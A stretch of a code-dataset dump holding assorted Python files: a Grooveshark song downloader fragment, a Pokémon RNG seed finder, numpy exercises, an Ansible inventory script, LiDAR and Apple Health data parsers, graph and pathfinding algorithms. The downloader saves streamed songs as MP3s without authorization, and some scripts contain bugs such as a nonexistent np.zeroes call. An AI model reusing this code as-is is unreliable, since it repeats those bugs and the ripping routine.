the selected song\n if stream == None:\n raise Exception(\"StreamKey not found\")\n\n #markTimer = threading.Timer(30 + random.randint(0,5), self.markStreamKeyOver30Seconds, [search[choice][\"SongID\"], str(self.queueID), stream[\"ip\"], stream[\"streamKey\"]])\n #markTimer.start()\n data = {\"streamKey\":stream[\"streamKey\"]}\n headers = {\"Accept-Encoding\":\"gzip, deflate\", \"Host\":stream[\"ip\"], \"User-Agent\":self.USERAGENT}\n try:\n \n\n self.markSongDownloadedEx(stream[\"ip\"], search[songid][\"SongID\"], stream[\"streamKey\"])\n\n self.downloader.download((\"http://%s/stream.php\" % (stream[\"ip\"])), (\"%s - %s.mp3\" % (search[songid][\"ArtistName\"], search[songid][\"SongName\"])), data, headers, callBack)\n \n self.markSongQueueSongPlayed(stream[\"ip\"], stream[\"streamKey\"], search[songid][\"SongID\"])\n\n self.removeSongsFromQueue()\n\n except KeyboardInterrupt:\n\n os.remove('%s - %s.mp3' % (search[songid][\"ArtistName\"], search[songid][\"SongName\"]))\n\n self.markSongDownloadedEx(stream[\"ip\"], search[songid][\"SongID\"], stream[\"streamKey\"])\n","sub_path":"python/groovylib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542538888","text":"# Script to get Gen 3 initial seeds from a target seed\r\n\r\nimport LCRNG\r\n\r\nprint(\"------------------------\")\r\nmaxAdvances = int(input(\"Max Advances: \"))\r\ntargetSeed = int(input(\"Target Seed: 0x\"),16)\r\nprint(\"------------------------\")\r\n\r\nadvances = 0\r\nrng = LCRNG.PokeRNGR(targetSeed)\r\nseeds = []\r\nwhile (advances <= maxAdvances):\r\n rng.nextUInt()\r\n advances += 1\r\n if rng.seed < 0xFFFF:\r\n print(advances,hex(rng.seed))\r\n seeds.append(hex(rng.seed))\r\n\r\nprint(seeds)","sub_path":"gen3_initial_seed_finder.py","file_name":"gen3_initial_seed_finder.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"532982716","text":"import time\nimport wifi_Functions\nimport subprocess\n\n\"\"\"\na = 3\nb = 4\n\nstart = time.time()\nsubprocess.call(['python','flag_init.py']) # [rpi_flags][pi_flags.pkl]\nend = time.time()\nprint(end - start)\n\"\"\"\n\nwhile True:\n try:\n fp = open('htc.txt', 'r')\n except EOFError:\n print('eoferror')\n except IOError:\n print('ioerror')\n print('out of try')\n\n","sub_path":"resources/timetest.py","file_name":"timetest.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"389100360","text":"import numpy as np\r\na = np.array([1,2,3])\r\nprint(a)\r\na = np.array([[1,2],[3,4]])\r\nprint(a)\r\na.shape\r\na.size\r\na.reshape(4,1)\r\na.reshape(1,4)\r\na = np.arange(24)\r\nprint(a)\r\na.shape\r\na.reshape(24,1)\r\na.reshape(1,24)\r\na.reshape(4,6)\r\nprint(a.reshape(3,2,4))\r\na.ndim\r\na.reshape(3,2,4).ndim\r\na = np.zeroes([3,2])\r\nprint(a)\r\na = np.zeroes([3,2],dtype=int)\r\nprint(a)\r\na = np.zeroes([3,2],dtype=complex)\r\nprint(a)\r\na = np.ones([3,2],dtype=int)\r\nprint(a)\r\na = np.eye(5)\r\na=np.full([3,2],7)\r\nprint(a)\r\na = np.random.randint(4)\r\nprint(a)\r\na = np.array([[1,2],[3,4]])\r\nb = np.empty_like(a)\r\nprint(b)\r\na = [1,2,3,4,5,6,7,8,9,10]\r\nb = np.delete(a,[2,4,6]) #deletes the indexed value\r\nprint(b)\r\na = np.array([[1,2,3],[4,5,6],[7,8,9]])\r\nlen(a)\r\nb = np.delete(a,[1])\r\nprint(b)\r\nb = np.delete(a,[1],axis=0)\r\nprint(b)\r\nb = np.delete(a,[1],axis=1)\r\nprint(b)\r\n","sub_path":"Code/numerical.py","file_name":"numerical.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"590882429","text":"#! /usr/bin/python\n\n# Copyright (c) 2010-2016 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport json\n\nfrom ansible_storlet_management_vars import mgmt_vars\n\n\nclass Inventory(object):\n\n '''\n Ansible inventory , generated from config file\n '''\n def __init__(self, fname):\n self.__load_config__(fname)\n\n def __load_config__(self, name):\n with open(name) as f:\n self.conf = json.loads(f.read())\n\n def show_list(self):\n g = {}\n for group in ['storlet-mgmt', 'storlet-proxy', 'storlet-storage',\n 'docker']:\n g[group] = dict()\n g[group]['hosts'] = self.conf['groups'][group]\n g[group]['vars'] = dict()\n g[group]['vars'].update(self.conf['all'])\n return g\n\n def show_host(self, name):\n res = dict()\n res['ansible_ssh_user'] = self.conf['all']['ansible_ssh_user']\n return res\n\n def write_inventory(self, inventory_file):\n inventory = dict()\n inventory['groups'] = self.conf['groups']\n for group in ['storlet-mgmt', 'storlet-proxy', 'storlet-storage',\n 'docker']:\n for host in self.conf['groups'][group]:\n if host not in inventory:\n inventory[host] = dict()\n if group == 'storlet-mgmt':\n inventory[host]['ansible_ssh_user'] =\\\n self.conf['all']['storlets_management_user']\n else:\n inventory[host]['ansible_ssh_user'] =\\\n self.conf['all']['ansible_ssh_user']\n\n all_vars = dict()\n for v in mgmt_vars:\n all_vars[v] = self.conf['all'][v]\n inventory['all'] = all_vars\n\n with open(inventory_file, 'w') as f:\n f.write(json.dumps(inventory))\n\n return inventory\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--list', action='store_true')\n parser.add_argument('--host')\n parser.add_argument('--inventory')\n args = parser.parse_args()\n inventory = Inventory('deploy/cluster_config.json')\n out = {}\n if args.list:\n out = inventory.show_list()\n\n if args.host:\n out = inventory.show_host(args.host)\n\n if args.inventory:\n out = inventory.write_inventory(args.inventory)\n\n print(json.dumps(out))\n\nif __name__ == '__main__':\n main()\n","sub_path":"install/storlets/management/storlets_dynamic_inventory.py","file_name":"storlets_dynamic_inventory.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"73233567","text":"import pandas as pd\r\nimport numpy as np\r\nfrom datetime import datetime\r\n\r\n#adds tom swinfield's extracted LiDAR points\r\n\r\ndef combineDatasets(vegplotdata,lidar_topo,lidar_PAI,lidar_tch,dataloggers,allpoints,outfile):\r\n\t'''\r\n\tcombines the vegplot, lidar topography, lidar PAI and lidar tch datasets with the dailyData\r\n\t(dailyData is summarised datalogger data by point and date)\r\n\t'''\r\n\r\n\t#open files\r\n\ttopo=pd.read_csv(lidar_topo)\r\n\tPAI=pd.read_csv(lidar_PAI)\r\n\ttch=pd.read_csv(lidar_tch)\r\n\tveg=pd.read_csv(vegplotdata)\r\n\tdata=pd.read_csv(dataloggers)\r\n\txl=pd.ExcelFile(allpoints)\r\n\twidths=xl.parse('SAFEPoints.txt')\r\n\r\n\t#extract headers of veg and lidar variables\r\n\ttopoHeaders=topo.columns[4:]\r\n\r\n\tPAIHeaders=PAI.columns[3:]\r\n\r\n\ttchHeaders=tch.columns[4:]\r\n\r\n\tvegHeaders=veg.columns[2:]\r\n\r\n\t###change point codes in lidar files to have a 0 before the point number\r\n\tfor i in topo.index:\r\n\t\ttopo.loc[i,'site']=str(topo.loc[i,'site'].split('-')[0])+'-0'+str(topo.loc[i,'site'].split('-')[1])\r\n\t\ttopo.loc[i,'site_point'] = str(topo.loc[i,'site']) + '-' + str(topo.loc[i,'point']).lower().replace(\" \", \"\")\r\n\tfor i in PAI.index:\r\n\t\tPAI.loc[i,'site']=str(PAI.loc[i,'site'].split('-')[0])+'-0'+str(PAI.loc[i,'site'].split('-')[1])\r\n\t\tPAI.loc[i,'site_point'] = str(PAI.loc[i,'site']) + '-' + str(PAI.loc[i,'point']).lower().replace(\" \", \"\")\r\n\tfor i in topo.index:\r\n\t\ttch.loc[i,'site']=str(topo.loc[i,'site'].split('-')[0])+'-0'+str(tch.loc[i,'site'].split('-')[1])\r\n\t\ttch.loc[i,'site_point'] = str(tch.loc[i,'site']) + '-' + str(tch.loc[i,'point']).lower().replace(\" \", \"\")\r\n\r\n\tfor i in topoHeaders: #create new columns in dataframe with lidar variables\r\n\t\tdata[i]=''\r\n\tfor i in PAIHeaders: #create new columns in dataframe with lidar variables\r\n\t\tdata[i]=''\r\n\tfor i in tchHeaders: #create new columns in dataframe with lidar variables\r\n\t\tdata[i]=''\r\n\tfor i in vegHeaders: #create new columns in dataframe with veg variables\r\n\t\tdata[i]=''\r\n\r\n\tprint('Creating column of river points to match against lidar data.')\r\n\t#makes a column to match up the logger data to veg and lidar data with\r\n\tfor i in data.index:\r\n\t\tif str(data.loc[i,'Point']) != '10':\r\n\t\t\tdata.loc[i,'RiverPointCode'] = data.loc[i,'River'].upper() + '-0' + str(data.loc[i,'Point'])\r\n\t\telse:\r\n\t\t\tdata.loc[i,'RiverPointCode'] = data.loc[i,'River'].upper() + '-'+str(data.loc[i,'Point'])\r\n\r\n\t\tdata.loc[i,'RiverPointPositionCode'] = data.loc[i,'RiverPointCode'] + '-' + str(data.loc[i,'Position']).lower()\r\n\r\n\r\n\tprint('Search through lidar databases matching sites and appending data.')\r\n\tfor i in topo.index:\r\n\t\tfor j in data.index:\r\n\t\t\tif topo.loc[i,'site_point']==data.loc[j,'RiverPointPositionCode']:\r\n\t\t\t\tfor k in topoHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=topo.loc[i,k]\r\n\r\n\tfor i in PAI.index:\r\n\t\tfor j in data.index:\r\n\t\t\tif PAI.loc[i,'site_point']==data.loc[j,'RiverPointPositionCode']:\r\n\t\t\t\tfor k in PAIHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=PAI.loc[i,k]\r\n\r\n\tfor i in tch.index:\r\n\t\tfor j in data.index:\r\n\t\t\tif tch.loc[i,'site_point']==data.loc[j,'RiverPointPositionCode']:\r\n\t\t\t\tfor k in tchHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=tch.loc[i,k]\r\n\r\n\tprint('Search through vegplot database matching sites and appending data.')\r\n\tfor i in veg.index: #searches through the lidar database for matching sites and appends veg data to dataloggers data\r\n\t\tfor j in data.index:\r\n\t\t\tif veg.loc[i,'Plot #']==data.loc[j,'RiverPointCode']:\r\n\t\t\t\tfor k in vegHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=veg.loc[i,k]\r\n\r\n\t# '''\r\n\t# Generate landuse bins for plotting purposes and generate distances from the buffer edge and river for each file\r\n\t# '''\r\n\t#\r\n\t# data=append_site_data(data,widths)\r\n\t#\r\n\t# #create empty distance columns for OP and CF that will not have matches.\r\n\t# data['Distance_from_edge']=''\r\n\t# data['Distance_from_river']=''\r\n\t#\r\n\t# for i in data.index:\r\n\t# \tif data.loc[i, 'Position']=='buffer5m':\r\n\t# \t\tif data.loc[i,'width']!='':\r\n\t# \t\t\tif data.loc[i,'width']>=5:\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_edge']=data.loc[i,'width']-5\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=5\r\n\t# \t\t\telse:\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t#\r\n\t# \telif data.loc[i,'Position']=='buffer15m':\r\n\t# \t\tif data.loc[i,'width']!='':\r\n\t# \t\t\tif data.loc[i,'width']>=15:\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_edge']=data.loc[i,'width']-15\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=15\r\n\t# \t\t\telse:\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t#\r\n\t# \telif data.loc[i,'Position']=='bufferedge':\r\n\t# \t\tif data.loc[i,'width']!='':\r\n\t# \t\t\tif data.loc[i,'width']>=25: #if more than 5m from previous logger\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_edge']=5\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=(data.loc[i,'width'])-5\r\n\t# \t\t\telif data.loc[i,'width']>=20: #otherwise if not more than 5m from logger\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_edge']=5\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=(data.loc[i,'width'])\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t# \t\t\telse:\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t#\r\n\t#\r\n\t# \tif data.loc[i,'River']=='ROP2' or data.loc[i,'River']=='ROP10':\r\n\t# \t\t\t\tdata.loc[i,'LandUseBins']='RR=0'\r\n\t# \telif data.loc[i,'LandUse']!='RR':\r\n\t# \t\tdata.loc[i,'LandUseBins']=data.loc[i,'LandUse']\r\n\t#\r\n\t#\r\n\t# \telif data.loc[i,'width']!='' and data.loc[i,'Distance_from_edge']!='' and data.loc[i,'Distance_from_river']!='':\r\n\t# \t\tif data.loc[i, 'Distance_from_edge']<30:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR<30m'\r\n\t# \t\telif data.loc[i,'Distance_from_edge']<60:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR<60m'\r\n\t# \t\telif data.loc[i, 'Distance_from_edge']<90:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR<90m'\r\n\t# \t\telif data.loc[i, 'Distance_from_edge']>=90:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR90m+'\r\n\t#\r\n\t# \telse:\r\n\t# \t\tdata.loc[i,'LandUseBins']='RR_UnknownWidth'\r\n\t#\r\n\r\n\tdata.to_csv(outfile, sep=',')\r\n\r\n\tprint('Saved as ' + outfile)\r\n\r\ndef append_site_data(infile,allpoints):\r\n\t'''\r\n\tadd columns to each logger file with the buffer width and the gps elevation for the point\r\n\t'''\r\n\t#read in the widths data and the infile\r\n\tdata=infile\r\n\twidths=allpoints\r\n\r\n\t#generate code for each line of the width file to match against the logger files\r\n\tfor i in widths.index:\r\n\t\tif str(widths.loc[i,'name'])[:3]=='SJI':\r\n\t\t\twidths.loc[i,'name']=str(widths.loc[i,'name'])[:4]+'-'+str(widths.loc[i,'name'])[-2:]\r\n\r\n\t\t#rr12 and rr14 are just down as r12 and r14 in the width file for some reason\r\n\t\telif str(widths.loc[i,'name'])[:3]=='R12' or str(widths.loc[i,'name'])[:3]=='R14':\r\n\t\t\twidths.loc[i,'name']='R'+str(widths.loc[i,'name'][:3])+'-'+str(widths.loc[i,'name'])[-2:]\r\n\t\telif str(widths.loc[i,'name'])[:2]=='RR':\r\n\t\t\tif str(widths.loc[i,'name'])[3]==' ':\r\n\t\t\t\twidths.loc[i,'name']=str(widths.loc[i,'name'])[:3]+'-'+str(widths.loc[i,'name'])[-2:]\r\n\t\t\telif str(widths.loc[i,'name'])[4]==' ':\r\n\t\t\t\twidths.loc[i,'name']=str(widths.loc[i,'name'])[:4]+'-'+str(widths.loc[i,'name'])[-2:]\r\n\t\t#if not a riparian buffer, do not create a name to match\r\n\t\telse:\r\n\t\t\tpass\r\n\r\n\t#match up the width and elevation to the logger file, if no match found still create column but empty\r\n\tx=0\r\n\tfor i in widths.index:\r\n\t\tif x==0:\r\n\t\t\tif widths.loc[i,'name']==data.loc[0,'RiverPointCode']:\r\n\t\t\t\tdata.loc['width']=widths.loc[i,'width']\r\n\t\t\t\tdata.loc['GPS_ele']=widths.loc[i,'GPS_ele']\r\n\t\t\t\tx=1\r\n\tif x==0:\r\n\t\tdata['width']=''\r\n\t\tdata['GPS_ele']=''\r\n\r\n\t#return the dataframe to feed into next function\r\n\treturn data\r\n","sub_path":"lidar_veg_point_TS.py","file_name":"lidar_veg_point_TS.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336508037","text":"value = int(input(\"Type in the goal number: \"))\r\nx = 1\r\ndoubleValue = 0\r\nsingleValue = 0\r\n\r\n\r\nwhile x < value:\r\n x = x * 2\r\n doubleValue += 1\r\n\r\n\r\nif x == value:\r\n print(\"Done, you just have to double\", doubleValue, \"times\")\r\nelif x > value:\r\n x = x / 2\r\n doubleValue -= 1\r\n\r\n while x < value:\r\n x = x + 1\r\n singleValue += 1\r\n print(\"Done, you have to double\", doubleValue, \"and add one\", singleValue, \"times\")\r\n","sub_path":"My original work/number-check.py","file_name":"number-check.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"314131707","text":"def config(lab):\r\n '''\r\n Finds the coordinates of the top-left corner of the first zone.\r\n lab: lab name, str\r\n rtype: (float, float)\r\n '''\r\n # Center of Pitt design is at (1500, 2000)\r\n if lab == 'Pitt':\r\n x_top_left = 1048.5\r\n y_top_left = 2551.5\r\n\r\n # Center of Grenoble design is at (0, 0)\r\n elif lab == 'Grenoble':\r\n x_top_left = 1048.5 - 1500\r\n y_top_left = 2551.5 - 2000\r\n \r\n return x_top_left, y_top_left\r\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277323568","text":"# -*- encoding: utf-8 -*-\n# @File: 0803.py \n# @Time: 2020-07-31 11:20\n# @Author: ZHANG\n# @Description: 0803\n\n\nclass Solution:\n \"\"\"暴力法\"\"\"\n # def findMagicIndex(self, nums) -> int:\n # for ind, v in enumerate(nums):\n # if ind == v:\n # return ind\n # return -1\n\n \"\"\"二分剪枝:二分+分治\"\"\"\n def _binFind(self, nums, start, end):\n if start > end:\n return -1\n mid = (end - start) // 2 + start\n left_ans = self._binFind(nums, start, mid - 1)\n if left_ans != -1:\n return left_ans\n elif nums[mid] == mid:\n return mid\n return self._binFind(nums, mid + 1, end)\n\n def findMagicIndex(self, nums) -> int:\n return self._binFind(nums, 0, len(nums) - 1)\n\n\nif __name__ == \"__main__\":\n nums = [0, 2, 3, 4, 5]\n s = Solution()\n print(s.findMagicIndex(nums))\n","sub_path":"lc/0803.py","file_name":"0803.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"50851648","text":"# /usr/bin/python3.6\n# -*- coding:utf-8 -*-\n\n\nclass Solution(object):\n def binaryGap(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n zeros = [len(x) for x in bin(N)[2:].split(\"1\")[1:-1]]\n if zeros:\n return max(zeros)+1\n return 0\n\n\ndef main():\n s = Solution()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/leetcode/868_Binary_Gap.py","file_name":"868_Binary_Gap.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"195373109","text":"from lxml import etree\nfrom tqdm import tqdm\n\n# Get activity/health data as XML tree\ntree = etree.parse('../apple_health_export/export.xml')\n\n# -----------------------------------------------------------\n# Parse HKActivitySummary data\n# -----------------------------------------------------------\n# Store the following from `Workout` elements:\n# workoutActivityType, duration, durationUnit,\n# totalEnergyBurned, totalEnergyBurnedUnit,\n# -----------------------------------------------------------\n\n# Get the heart rate data from the XML tree\nworkout_xml_data = list(tree.xpath(\"//ActivitySummary\"))\n\n# for i, data in zip(range(10), workout_xml_data):\n# print('%d,%s' % (i, str(data.attrib)))\n\nactivity_dictionary = dict()\nexercise_time_unit = 'min'\n\nwith open('../ian-torres_health_data/ian-torres_activity_data.csv', 'w') as f:\n f.write('Record_#,Date(Year-Month-Day),Energy_Burned(kcal),'\n 'Energy_Burned_Goal(kcal),'\n 'Exercise_Time(min),Exercise_Time_Goal(min),'\n 'Stand_Hours,Stand_Hours_Goal\\n')\n for i, element in enumerate(tqdm(workout_xml_data, desc='writing activity data')):\n element_attributes = element.attrib\n date_component = element_attributes['dateComponents']\n\n energy_burned = int(float(element_attributes['activeEnergyBurned']))\n energy_burned_goal = int(element_attributes['activeEnergyBurnedGoal'])\n energy_burned_units = element_attributes['activeEnergyBurnedUnit']\n exercise_time = int(float(element_attributes['appleExerciseTime']))\n exercise_time_goal = int(element_attributes['appleExerciseTimeGoal'])\n stand_hours = int(element_attributes['appleStandHours'])\n stand_hours_goal = int(element_attributes['appleStandHoursGoal'])\n f.write('%d,%s,%d,%d,%d,%d,%d,%d\\n' % (\n i, date_component, energy_burned, energy_burned_goal,\n exercise_time, exercise_time_goal, stand_hours, stand_hours_goal\n ))\n","sub_path":"scripts/xml_activity_parser.py","file_name":"xml_activity_parser.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"593297490","text":"# -*- coding: utf-8 -*-\n\n# Autor: Mauricio de Oliveira (mauricioliveira_@hotmail.com)\n# Universidade Federal de Minas Gerais\n# Departamento de Ciência da Computação\n\nimport sys\nimport bisect\nfrom timeit import default_timer as timer\nfrom myfunctions import read_file, create_adj_list\nfrom itertools import combinations \nfrom random import randint, shuffle\n\nFILE_END = '0,0'\nDELIMITER_1 = \",\"\nDELIMITER_2 = \" \" \n\ndef dfs(g, start):\n\n visited = set()\n stack = [start]\n \n while stack:\n\n v = stack.pop()\n\n if v not in visited:\n\n visited.add(v)\n stack.extend(g[v] - visited)\n \n return visited\n\ndef is_connected(g, cds):\n\n if len(cds):\n\n induced_subg = {k: set([item for item in v if item in cds]) \n for k, v in g.items() if k in cds}\n\n k = randint(0, len(cds) - 1)\n v = list(cds)[k]\n seen = dfs(induced_subg, v)\n \n return True if seen == set(cds) else False \n\n else:\n\n return False\n\ndef is_dominating(g, cds, vertices):\n\n if len(cds):\n\n seen = set()\n seen.update(cds)\n seen.update([vv for v in cds for vv in g[v]])\n\n return True if seen == set(vertices) else False \n\n else:\n\n return False\n\ndef calculate_degree(g):\n\n deg_g = {v:len(g[v]) for v in g}\n \n #for key in deg_g: print(key +\":\"+ str(deg_g[key]))\n\n return deg_g \n\ndef order_vertices(deg_g, g, mode):\n\n ordered_vertices = []\n\n for v in g.keys():\n \n uniq_coef = sum([deg_g[vv] for vv in g[v]])\n bisect.insort_left(ordered_vertices, ((float(deg_g[v])/uniq_coef), v))\n print(v, float(deg_g[v]), uniq_coef)\n ordered_vertices = [v[1] for v in ordered_vertices]\n\n if mode == 1:\n\n # ascending order\n\n return ordered_vertices\n\n elif mode == 2:\n\n # descending order\n\n return ordered_vertices[::-1]\n\n else:\n\n # randomized order\n\n shuffle(ordered_vertices)\n return ordered_vertices\n\ndef find_mcds(g, deg_g, vertices):\n \n mcds = set(vertices)\n watch = list()\n\n for v in vertices:\n\n mcds_copy = mcds.copy()\n mcds_copy.remove(v)\n\n if is_connected(g, mcds_copy) and is_dominating(g, mcds_copy, vertices): \n \n mcds.remove(v)\n watch.append(v)\n\n mcds = sorted(list(mcds))\n return mcds, watch\n\nif __name__ == \"__main__\":\n\n delimiter = DELIMITER_1 if sys.argv[2] == \"1\" else DELIMITER_2\n graph_data = read_file(sys.argv[1], delimiter)\n g = create_adj_list(graph_data)\n\n start = timer()\n deg_g = calculate_degree(g)\n vertices = order_vertices(deg_g, g, int(sys.argv[3]))\n print(vertices, deg_g)\n mcds = find_mcds(g, deg_g, vertices)\n print(\"mcds\")\n print(mcds[0], len(mcds[0]))\n #print(\"vertices\")\n #print(vertices)\n #print(\"ordem\")\n #print(mcds[1], len(mcds[1])) \n end = timer() \n print(end - start)\n\n","sub_path":"final/final/heuristica/mcds_rank.py","file_name":"mcds_rank.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"504365376","text":"class State(object):\n \"\"\"\n Generic datatype for storing a state.\n A state is defined by:\n - its cell\n - its parent state (i.e the (unique) state whose child is self).\n - its cost so far (note that this is redundant, since it could be computed\n from parents, but here we explicitly compute it each time a Solution\n is created).\n \"\"\"\n\n def __init__(self, cell, parent, time_so_far):\n self.cell = cell\n self.parent = parent\n self.time_so_far = time_so_far\n\n def get_all_parents(self):\n if self.parent:\n return self.parent.get_all_parents() + [self.cell]\n else:\n return [self.cell]\n\n\nclass BranchAndBoundForMap:\n def __init__(self, lm, cell_i, cell_f, costs_materials, costs_objects,\n possible_materials, possible_objects):\n self.lm = lm\n self.cell_i = cell_i\n self.cell_f = cell_f\n self.costs_materials = costs_materials\n self.costs_objects = costs_objects\n self.possible_materials = possible_materials\n self.possible_objects = possible_objects\n self.lnl = [] #lnl = Live Nodes List\n self.enode = None #enode = Expanding-Node\n\n def cost(self, state):\n return self.distance(state) + state.time_so_far\n\n def distance(self, state):\n x0,y0 = state.cell.coord\n dx = abs(x0 - self.cell_f.coord[0])\n dy = abs(y0 - self.cell_f.coord[1])\n return dx + dy\n\n def get_children(self, state):\n x, y = state.cell.coord\n children = []\n up = self.lm.get_cell_at(x,y-1)\n down = self.lm.get_cell_at(x,y+1)\n right = self.lm.get_cell_at(x+1,y)\n left = self.lm.get_cell_at(x-1,y)\n for cell in [up,down,right,left]:\n if cell:\n obj_type = None\n possible = False\n if cell.objects:\n obj_type = cell.objects[0].int_type\n if obj_type in self.possible_objects:\n possible = True #e.g, bridge is on material water!\n else:\n possible = True\n if possible:\n really_possible = False\n time = 0.\n if cell.objects:\n time += self.costs_objects.get(obj_type,0.)\n really_possible = True\n elif cell.material.name in self.possible_materials:\n time += self.costs_materials.get(cell.material.name,0.)\n really_possible = True\n## elif cell.objects:\n## really_possible = True\n if really_possible:\n child = State(cell, state, state.time_so_far + time)\n children.append(child)\n return children\n\n def solve(self):\n solution = self.process()\n #\n if solution is None:\n return []\n return solution.get_all_parents()\n\n def process(self):\n initial_state = State(self.cell_i, None, self.costs_materials[self.cell_i.material.name])\n self.lnl = [initial_state]\n self.enode = self.lnl.pop()\n already = set([self.enode.cell.coord])\n i = 0\n while True:\n## print(self.enode.cell.coord, self.distance(self.enode))\n if self.distance(self.enode) == 0:\n return self.enode\n else:\n if i > 1e5:\n return\n self.lnl += self.get_children(self.enode)\n if not self.lnl:\n return\n else:\n #sort the lnl and reverse so that default pop function can be called\n self.lnl.sort(key=self.cost, reverse=True)\n #updates enode\n self.enode = self.lnl.pop()\n while self.enode.cell.coord in already and self.lnl:\n self.enode = self.lnl.pop()\n already.add(self.enode.cell.coord)\n i += 1\n","sub_path":"ia/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"519355033","text":"from typing import List\nfrom injecta.service.Service import Service\n\nclass Classes2ServicesBuilder:\n\n def build(self, services: List[Service]):\n classes = {}\n\n for service in services:\n moduleName = service.class_.moduleName\n className = service.class_.className\n\n if moduleName not in classes:\n classes[moduleName] = {}\n\n if className not in classes[moduleName]:\n classes[moduleName][className] = []\n\n classes[moduleName][className].append(service.name)\n\n return classes\n","sub_path":"src/injecta/service/Classes2ServicesBuilder.py","file_name":"Classes2ServicesBuilder.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"282635235","text":"import json\nimport os\nimport matplotlib.pyplot as plt\nfrom os.path import expanduser\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport pathlib\n\ndef isImgFile(file):\n # Check if file has certain base name and is of the proper file type\n return file.endswith(\".png\") and not(file.endswith(\".cs.png\")) and not(file.endswith(\".depth.png\"))\n\n\ndef isBboxFile(file):\n # Check if file has certain base name and is of the proper file type\n return file.endswith(\".json\")\n\n\nclass Dataloader(Dataset):\n\n # Initialize the Dataloader (this is the constructor)\n def __init__(self, base_directory):\n # Get the file names\n ROOT = pathlib.Path(expanduser(\"~\")) / base_directory\n self.filenames_img = [os.path.join(path, file) for path, directories, filenames in os.walk(ROOT) for\n file in filenames if isImgFile(file)]\n self.filenames_bbox = [os.path.join(path, file) for path, directories, filenames in os.walk(ROOT) for\n file in filenames if isBboxFile(file)]\n\n self.filenames = [os.path.splitext(file)[0] for path, directories, filenames in os.walk(ROOT) for file in filenames if\n isImgFile(file)]\n\n # Check if we have same number of images and bounding boxes\n assert len(self.filenames_img) == len(self.filenames_bbox), 'Not the same number of images and bounding boxes'\n\n # Sort the lists to make sure that we entries of _img and _bbox correspond to one another.\n self.filenames_img.sort()\n self.filenames_bbox.sort()\n self.filenames.sort()\n\n print(self.filenames)\n\n def __getitem__(self, index):\n # Get image file name.\n filename_img = self.filenames_img[index]\n\n # Open file.\n with open(filename_img, 'rb') as f:\n # Read file as RGB image.\n img = Image.open(f).convert('RGB')\n\n # Get json file name.\n filename_bbox = self.filenames_bbox[index]\n\n # Open file.\n with open(filename_bbox, 'rb') as g:\n # Read bbox from .json file.\n bbox = json.load(g)[\"objects\"][0][\"bounding_box\"]\n\n with open(filename_bbox, 'rb') as h:\n # Read bbox from .json file.\n label = json.load(h)[\"objects\"][0][\"class\"]\n\n return img, bbox\n\n def __len__(self):\n return len(self.filenames_img)\n\nif __name__ == '__main__':\n a = Dataloader(\"data/Eigenes_Set/Kite\")\n b, c = 